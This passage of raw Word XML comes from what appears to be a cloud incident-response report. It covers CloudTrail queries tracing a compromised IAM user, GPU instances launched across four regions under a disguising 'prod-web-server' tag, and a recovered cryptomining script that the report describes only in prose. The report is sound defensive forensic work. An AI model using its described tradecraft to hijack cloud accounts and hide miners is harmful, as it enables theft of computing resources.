                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 21:03:07.045 UTC</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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="4484757"/>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89320" cy="448475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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 — Sysmon event showing AWS credentials copied into the .exfil staging directory.</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. AWS Credential Access and Attribution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 CloudTrail Filtering Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The CloudTrail dataset was loaded into TrailInspector. Events were filtered by the external source IP observed in the incident. The query sourceIPAddress=3.72.63.40 returned 25 events. Event details showed the IAM identity, user agent, account ID, region, and request parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="3013678"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="24" l="0" r="0" t="24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="301367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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 — TrailInspector filtered to source IP 3.72.63.40, showing the compromised IAM identity and automation user agent.</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B1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CloudTrail attribute</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3.72.63.40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5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IAM ARN</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">arn:aws:iam::990227772331:user/admin</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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User name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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS account ID</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">990227772331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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User agent</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">InfrastructureAutomation/3.0.1 go1.22.5 (cloud-ops-deployment) linux/amd64</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BD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Identity type</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IAMUser</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8. Cloud Resource Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Unauthorized EC2 Instance Count and Regions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: TrailInspector was queried with sourceIPAddress=3.72.63.40 AND eventName=RunInstances. The result set contained 16 RunInstances events. Region facets and event rows showed an even distribution of four launches in each of four regions: ap-southeast-1, us-east-1, eu-west-1, and us-west-2.</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C4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metric</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Result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C6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RunInstances events</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">16</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C8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS regions used</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</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CA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Regions</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ap-southeast-1, us-east-1, eu-west-1, us-west-2</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CC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Distribution</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4 instance launches per region</w:t>
            </w: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drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="2795796"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="3183" l="0" r="0" t="3183"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="2795796"/>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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 — TrailInspector query showing 16 RunInstances events across four AWS regions.</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t xml:space="preserve">8.2 Instance Type and Resource Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: Individual RunInstances raw events were expanded. The requestParameters object consistently recorded instanceType p3.2xlarge. The tagSpecificationSet object assigned key Name with value prod-web-server. The benign-looking tag likely attempted to disguise mining infrastructure as a production workload.</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D4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Instance type</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">p3.2xlarge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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tag key</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Name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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tag value</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">prod-web-server</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C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitoring</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Disabled</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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Min/Max count per request</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1 / 1</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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="2851361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="807" l="0" r="0" t="807"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="2851361"/>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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9 — Raw CloudTrail RunInstances event showing the p3.2xlarge instance type.</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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5989320" cy="2860134"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="51" l="0" r="0" t="51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989320" cy="286013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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 — Raw CloudTrail event showing the Name=prod-web-server tag.</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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Cryptomining Payload Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Recovered mining.sh Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The recovered mining.sh artifact was decompressed and reviewed as text. The script downloaded the official XMRig 6.26.0 Linux static archive from GitHub, extracted it in /tmp, and launched xmrig with nohup. The command limited CPU use to 50 percent and suppressed console output while running in the background.</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0E9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Script setting</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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EB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
